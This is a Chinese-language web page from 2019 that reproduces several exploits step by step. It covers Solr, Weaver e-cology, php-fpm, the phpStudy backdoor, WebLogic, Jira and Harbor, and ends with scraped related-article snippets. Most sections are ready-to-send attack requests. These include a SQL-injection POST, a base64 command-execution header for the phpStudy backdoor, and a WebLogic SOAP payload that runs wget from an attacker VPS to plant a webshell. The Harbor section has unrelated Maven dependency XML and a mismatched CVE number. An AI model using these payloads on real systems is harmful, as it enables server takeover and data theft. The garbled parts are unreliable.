近期重要漏洞攻击验证情况 2019-11-8

近期重要漏洞攻击验证情况

一、      Apache Solr Velocity TemplateCVE-2019-0193-RCE

验证描述

Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。

Apache Solr基于Velocity模板存在远程命令执行漏洞。该漏洞是由于Velocity模板存在注入所致。攻击者可利用漏洞访问Solr服务器上Core名称,先把params.resource.loader.enabled设置为true(就可加载指定资源),在服务器执行命令。

验证信息

POC https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/

注:以上验证信息(方法)可能带有攻击性,仅供安全研究之用。请广大用户加强对漏洞的防范工作,尽快下载相关补丁。

二、 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞

 

验证描述

泛微e-cology OA 系统的前台接口WorkflowCenterTreeData 在使用 Oracle 数据库时存在未授权 SQL 注入漏洞。

 

验证信息

1.测试时要注意是否有授权

2.漏洞点在

/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333

3.所使用的POC如下:

POST

/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333

HTTP/1.1
Host: xxxxx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Cookie: testBanCookie=test; JSESSIONID=abcPFN5zZe8gbgbso7i3w; ecology_JSessionId=abcPFN5zZe8gbgbso7i3w
Upgrade-Insecure-Requests: 1
Content-Length: 2238
formids=11111111111))) 0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

三、php-fpm (CVE-2019-11043)漏洞

验证描述

来自Wallarm的安全研究员Andrew Danau在9月14号至16号举办的Real World CTF中,向服务器发送%0a(换行符)时,服务器返回异常信息,疑似存在漏洞。

当Nginx使用特定的fastcgi配置时,存在远程代码执行漏洞,但这个配置并非Nginx默认配置。

当fastcgi_split_path_info字段被配置为 ^(.+?\.php)(/.*)$;时,攻击者可以通过精心构造的payload,造成远程代码执行漏洞,该配置已被广泛使用,危害较大。

验证信息

下载攻击脚本

go get github.com/neex/phuip-fpizdam     # 默认下载之后会保存到前面

配置的go 的工作目录

配置docker 靶机

git clone https://github.com/neex/phuip-fpizdam.git

cd reproducer/

docker build -t reproduce-cve-2019-11043 .      # 注意后面有个点

docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043    # 运行靶机

靶机运行之后查看是否运行正常

靶机运行正常,利用poc 工具攻击靶机 验证服务器有漏洞的输出界面

第二次重新运行脚本,脚本会一直向服务器发包,这时在浏览器打开靶机地址,直接执行命令即可(url如下要多试几次才可以)

http://192.168.124.141:8080/script.php?a=id

利用成功结果如图

四、PhpStuday后门

验证描述

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无 需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户,9月20日杭州公安微信公众账号发布了“杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果”的文章,文章里说明phpstudy存在“后门”。

 

验证信息

启动漏洞版本对应的版本

成功启动环境

拦截数据包,添加如下的请求头字段:

Accept-Encoding中逗号后面的空格要去掉

Accept-Encoding: gzip,deflate

Accept-Charset为echo system(‘whoami‘)的base64编码

Accept-Charset: ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==

完整数据包利用的payload

GET / HTTP/1.1 Host: 10.211.55.3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Charset: 您添加的base64加密的执行语句 Accept-Language: zh-CN,zh;q=0.9 Connection: close

执行whoami相关回显

尝试ipconfig

python验证脚本截图:

五、 Weblogic高危漏洞复现 CVE-2019-2890

验证描述

WebLogic 是 Oracle 公司出品的基于 JavaEE 架构的中间件,用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用。

Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单,使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。

由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。

验证信息

linux下weblogic10.3.6复现

1.环境搭建

Weblogic10.3.6环境搭建参考:

https://blog.csdn.net/qq_27298687/article/details/82767247

2.漏洞路径

访问http://ip:port/_async/AsyncResponseService出现如下页面,可能存在该漏洞。

3.上传webshell

首先在公网vps中放如webshell,这里用weblogic.txt代替,内容为“hello word!!!”

然后使用burpsuite重放如下报文

POST /_async/AsyncResponseService HTTP/1.1Host: 192.168.37.128:7001Content-Length: 859Accept-Encoding: gzip, deflateSOAPAction:Accept: */*User-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: keep-alivecontent-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

六、Jira未授权SSRF漏洞复现

验证描述

Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。

docker进行搭建,下载地址:

docker pull cptactionhank/atlassian-jira:7.8.0

环境启动:

docker run --detach

--publish 8080:8080cptactionhank/atlassian-jira:7.8.0

 

验证信息

  1. http://yourip:8080访问安装(选择第二个安装)

下一步:

    下一步:(PS:需要生成使用许可)

下一步:

下一步,至此安装完成。

2.访问:

http://192.168.100.128:8080/secure/Dashboard.jspa进行抓包,替换POC,得到以下信息,说明漏洞存在。

在http://ceye.io/records/dns中可看到有NDS流量记录。

1.搭建环境时注意要申请使用许可

2.学海(安全圈)无涯苦作舟。

3.漏洞点在/plugins/servlet/gadgets/makeRequest

4.漏洞参考:

https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A

5.所使用的POC如下:

GET/plugins/servlet/gadgets/makeRequest?url=http://192.168.100.128:[email protected]/1.1

Host:192.168.100.128:8080

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding:gzip, deflate

Connection: close

Referer: http://192.168.100.128:8080/secure/Dashboard.jspa

X-Atlassian-Token:no-check

Upgrade-Insecure-Requests:1

Cache-Control:max-age=0

七、CVE-2019-1609 Harbor任意管理员注册漏洞

验证描述

Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全。提升用户使用Registry构建和运行环境传输镜像的效率。Harbor支持安装在多个Registry节点的镜像资源复制,镜像全部保存在私有Registry中, 确保数据和知识产权在公司内部网络中管控。

验证信息

1、安装docker

安装docker有很多问题可以查看这个

https://www.cnblogs.com/yufeng218/p/8370670.html

测试是否安装成功

  1. 2.    下载并安装harbor

1、Wgethttps://storage.googleapis.com/harbor-releases/release-1.8.0/harbor-online-installer-v1.8.1.tgz

2、tarxvf harbor-online-installer-v1.8.0.tgz

修改hostname为安装Harbor机器的IP地址

1、cd harbor

2、vi harbor.yml

安装harbor,

1、./install.sh

访问地址就能进入harbor后台。

使用admin账户登陆后发现已经成功写入帐号(admin账户密码在配置文件harbor.yml查看),并且为管理员权限。

poc地址https://github.com/dacade/cve-2019-16097

<dependency>
    <groupId>com.fasterxml.jackson.core</groupId>
    <artifactId>jackson-databind</artifactId>
    <version>2.9.8</version>
</dependency>

<!--https://mvnrepository.com/artifact/ch.qos.logback/logback-core -->
<dependency>
    <groupId>ch.qos.logback</groupId>
    <artifactId>logback-core</artifactId>
    <version>1.3.0-alpha4</version>
</dependency>

<!--https://mvnrepository.com/artifact/com.h2database/h2 -->
<dependency>
    <groupId>com.h2database</groupId>
    <artifactId>h2</artifactId>
    <version>1.4.199</version>
    <scope>test</scope>
</dependency>
<dependency>
    <groupId>com.h2database</groupId>
    <artifactId>h2</artifactId>
    <version>1.4.199</version>
    <scope>compile</scope>
</dependency>

原文地址:https://www.cnblogs.com/suiyujunshu/p/11819129.html

时间: 2024-10-14 12:02:12

近期重要漏洞攻击验证情况 2019-11-8的相关文章

基于Armitage的MSF自动化漏洞攻击实践

基于Armitage的MSF自动化漏洞攻击实践 目录 实践环境 预备知识 Armitage基础配置 ms08_067_netapi:自动化漏洞溢出攻击实践 ms14_064_ole_code_execution:IE漏洞自动化攻击实践 ms17_010_eternalblue:"永恒之蓝"自动化攻击实践 office_ms17_11882:Office漏洞自动化攻击实践 John the Ripper_linux口令破解模块:Armitage下Auxiliary辅助模块应用 实践中遇到

(转载)ASP网站如何防止注入漏洞攻击

SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如 果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉.但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况.能不能根据具体情 况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据. 据统计,网站用ASP+Access或SQLServer的占70%以 上,PHP+MySQ占L20%,其他的不足10%.在本文,以SQL-SERVER+ASP例

PHP的$_SERVER[&#39;PHP_SELF&#39;]造成的XSS漏洞攻击及其解决方案

$_SERVER['PHP_SELF']简介 $_SERVER['PHP_SELF'] 表示当前 PHP文件相对于网站根目录的位置地址,与 document root 相关. 假设我们有如下网址,$_SERVER['PHP_SELF']得到的结果分别为: http://www.php-note.com/php/    :   /php/test.php http://www.php-note.com/php/test.php    :    /php/test.php http://www.ph

ThinkPHP v5 新漏洞攻击案例首曝光,阿里云已可告警并拦截

2018年12月10日,ThinkPHP v5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞.阿里云态势感知已捕获多起基于该漏洞的真实攻击,并对该漏洞原理以及漏洞利用方式进行分析.现在,对于云上未及时进行系统更新的用户,阿里云态势感知已提供攻击告警,WAF产品支持同步拦截,目前云上客户基本未受到影响. 此次漏洞由ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令.电子商务行业.金融服务行业.互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关

解决反射型XSS漏洞攻击

对于程序员来说安全防御,无非从两个方面考虑,要么前端要么后台. 一.首先从前端考虑过滤一些非法字符. 前端的主控js中,在<textarea> 输入框标签中,找到点击发送按钮后,追加到聊天panel前 进行过滤Input输入内容 1 // 过滤XSS反射型漏洞 2 filterInputTxt: function (html) { 3 html = html.replace(/(.*<[^>]+>.*)/g,""); // HTML标记 4 html =

缓冲区溢出漏洞攻击原理

转自互联网 0x00 缓冲区溢出概念 缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上, 理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患,操作系统所使用的缓冲区,又被称为"堆栈".在各个操作进程之间,指令会被临时储存在"堆栈"当中,"堆栈"也会出现缓冲区溢出. 0x01 缓冲区溢出原理 程序员通过往程

2019.11.30训练赛总结

2019.11.30训练赛总结 Codeforces Round #499 (Div. 2) 总的来说是一场很不愉快的比赛.漏洞百出. 对于A题,其实没有什么技术含量,只是写的时候忘记了边界的情况,导致出现错误. B题,一定程度上考验了思维,既然从正面做不行,那么我可以反着来,既然求不可以正向求出答案,那我可以把答案枚举带进去看是否符合条件啊,如果数据范围再大点的话还可以二分. D题,也反应出了自己的一个漏洞,就是懒得一步一步去推数据,代数据进去.当出现bug的时候,最直接,最有效的办法,就是把

IIS的Unicode漏洞攻击

IIS有十多种常见漏洞,但利用得最多的莫过于Unicode解析错误漏洞.微软IIS 4.0/5.0在Unicode字符解码的实现中存在一个安全漏洞,用户可以远程通过IIS执行任意命令.当IIS打开文件时,如果该文件名包含Unicode字符,它会对它进行解码.如果用户提供一些特殊的编码,将导致IIS错误地打开或者执行某些Web根目录以外的文件或程序.我们此文就着重来讲讲如何利用这个漏洞入侵IIS. 对于IIS 4.0/5.0中文版,当IIS在收到的URL请求的文件名中,包含一个特殊的编码例如“%c

利用foo函数的Bof漏洞攻击

利用foo函数的Bof漏洞攻击 一.基础知识储备 objdump反汇编指令.gdb函数调试运行.Perl语言.|管道符 二.实验步骤 1. 通过反汇编了解程序功能及代码 ①反汇编查看文件内容 ②可以知道getShell函数地址为0804847d ③可知foo函数执行完成之后,系统会调用的下一条指令的地址为80484ba,此地址为返回地址 我们要做的就是通过foo函数的Bof漏洞输入一段设计好的字符串覆盖掉80484ba,使得80484ba的值为0804847d,这样就会执行getshell函数.